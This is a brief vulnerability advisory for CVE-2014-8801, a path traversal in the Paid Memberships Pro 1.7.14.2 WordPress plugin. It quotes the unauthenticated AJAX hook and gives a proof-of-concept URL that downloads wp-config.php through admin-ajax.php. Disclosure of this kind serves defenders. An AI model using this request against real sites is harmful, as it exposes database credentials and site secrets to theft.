Paid Memberships Pro 1.7.14.2 Path Traversal

Homepage:

https://wordpress.org/plugins/paid-memberships-pro/

CVE-ID

CVE-2014-8801

CVSS Score

7.8

CVSS Vector

(AV:N/AC:L/Au:N/C:C/I:N/A:N)

Description:

getfile.php is accessible to everyone.

File: paid-memberships-pro\includes\services.php

add_action('wp_ajax_nopriv_getfile', 'pmpro_wp_ajax_getfile');
function pmpro_wp_ajax_getfile()
{
	require_once(dirname(__FILE__) . "/../services/getfile.php");	
	exit;	
}

is_admin() function is used to check priveleges but because this code is run in context of wp-admin/admin-ajax.php this function always evalute to true.

So we can download any file.

Proof of Concept:

http://wordpress-url/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php

Timeline: